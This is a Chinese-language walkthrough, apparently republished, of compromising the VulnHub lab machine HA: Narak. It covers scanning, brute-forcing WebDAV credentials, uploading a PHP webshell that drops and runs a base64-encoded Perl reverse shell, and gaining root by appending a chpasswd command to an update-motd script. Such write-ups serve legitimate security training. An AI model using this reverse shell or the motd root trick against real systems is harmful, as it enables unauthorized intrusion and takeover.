靶機(jī)網(wǎng)址：https://www.vulnhub.com/entry/ha-narak,569/

目錄

一、信息搜集：

二、漏洞利用與探測(cè)：

三、提權(quán)

---

一、信息搜集：

獲取IP：

nmap -sP 192.168.8.0/24??

端口掃描：

nmap -sV -p- -sC 192.168.8.132 -n -vv

22、80端口均開啟

訪問192.168.8.132

從頁面搜索信息

·

翻譯了一下網(wǎng)頁內(nèi)容信息提取關(guān)鍵字或許有用： yamdoot,swarm,narak

目錄掃描：

gobuster dir -q -u http://192.168.8.132 -w /usr/share/seclists/Discovery/Web-Content/common.txt

注意到/webdav

訪問該目錄

用上邊關(guān)鍵字隨便輸入嘗試登錄也沒用

嘗試爆破獲取密碼

先爬取密碼文件

cewl 192.168.8.132 -w passwd1.txt?

再用hydra爆破以下

賬號(hào)密碼：yamdoot, Swarg

再嘗試登陸下：

無可用信息，查看下源代碼：

意思是服務(wù)器無法驗(yàn)證我是否有權(quán)訪問該文檔，或者密碼或者證書的問題

查找關(guān)于webdav的漏洞文章

用Metasploits模塊檢查是否啟用了webdav

使用 ：auxiliary/scanner/http/webdav_scanner

設(shè)置參數(shù)：

將路徑改為 /dav,這是webdav常用目錄

設(shè)置目標(biāo)IP地址

run啟動(dòng)模塊

掃描結(jié)果：

http信息，包括apache版本，是否啟用webdav

顯然結(jié)果是沒開啟，所以這條路行不通

再搜索關(guān)于webdav（可以上傳文件）:

WebDAV （Web-based Distributed Authoring and Versioning） 一種基于 HTTP 1.1協(xié)議的通信協(xié)議。它擴(kuò)展了HTTP 1.1，在GET、POST、HEAD等幾個(gè)HTTP標(biāo)準(zhǔn)方法以外添加了一些新的方法，使應(yīng)用程序可對(duì)Web Server直接讀寫，并支持寫文件鎖定(Locking)及解鎖(Unlock)，還可以支持文件的版本控制

所以進(jìn)一步可以實(shí)行上傳一個(gè)反鏈接腳本

二、漏洞利用與探測(cè)：

查找到cadaver可以對(duì)webdav進(jìn)行讀寫

上傳一個(gè)php的反鏈腳本

代碼如下（更改IP和端口）：

<?phpfunction which($pr) {$path = execute("which $pr");return ($path ? $path : $pr);}function execute($cfe) {$res = '';if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);$res = join("\n",$res);} elseif(function_exists('shell_exec')) {$res = @shell_exec($cfe);} elseif(function_exists('system')) {@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')) {@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f = @popen($cfe,"r"))) {$res = '';while(!@feof($f)) {$res .= @fread($f,1024);}@pclose($f);}}return $res;}function cf($fname,$text){if($fp=@fopen($fname,'w')) {@fputs($fp,@base64_decode($text));@fclose($fp);}}$yourip = "your IP";$yourport = 'your port';$usedb = array('perl'=>'perl','c'=>'c');$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR"."hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT"."sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI"."kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"."KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl"."OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";cf('/tmp/.bc',$back_connect);$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");?>

上傳shell

cadaver http://192.168.8.132/webdav

username：yamdoot

password:Swarg

再kali另一個(gè)終端開啟監(jiān)聽，網(wǎng)頁訪問192.168.8.132/webdav

已上傳

再去訪問shell.php

建立交互式shell

kali監(jiān)聽到結(jié)果：

python3 -c 'import pty;pty.spawn("/bin/bash")'

當(dāng)前權(quán)限不是最高權(quán)限，還需要進(jìn)一步提權(quán)

搜索信息

搜索到一串字符，搜索下Brainfuck可解碼

??????????????? 得到明文密碼：chitragupt

猜想用戶名應(yīng)該是 inferno narak 中一個(gè)

三、提權(quán)

先嘗試inferno登錄l連接ssh

連接成功

搜集信息

利用了motd，通過修改ssh登陸時(shí)的歡迎信息對(duì)root密碼進(jìn)行修改：

echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

退出后重新用inferno登錄

su -root

成功獲取root權(quán)限：

總結(jié)

以上是生活随笔為你收集整理的靶机：narak的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。